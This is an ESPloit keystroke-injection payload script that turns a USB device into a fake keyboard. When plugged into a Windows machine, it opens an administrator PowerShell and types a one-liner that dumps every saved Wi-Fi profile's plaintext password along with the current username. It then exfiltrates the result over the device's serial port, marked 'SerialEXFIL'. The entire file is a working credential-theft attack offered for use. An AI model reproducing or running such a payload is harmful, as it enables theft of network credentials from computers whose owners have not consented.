Rem:Generated by Dckuino.js by NURRL
Rem:Modified for use with ESPloit by Corey Harding
Rem:-----
Rem:Set default delay
DefaultDelay:1200
Rem:Swap keyboard-layout
Press:131+32
Rem:Open powershell as administrator
Press:131+114
Print:powershell
Press:128+129+176
CustomDelay:1000
Press:130+121
Rem:Extract wifipasswords and save to duck
CustomDelay:1000
PrintLine:$n = "STOLEN INTERNET CREDS FROM:";$n += whoami;$n += (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim();$_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim();$_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String; $s=(Get-WmiObject -Class Win32_PnPEntity -Namespace 'root\CIMV2' -Filter "PNPDeviceID like 'USB\\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'\(([^\)]+)\)').Groups[1].Value;$port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one;$port.open();ForEach ($l in $($n -split "`r`n")){$port.WriteLine("SerialEXFIL:$l");}; $port.Close();exit;
Press:176
Rem:Swap back keyboard-layout
CustomDelay:4000
Rem:Swap keyboard-layout
Press:131+32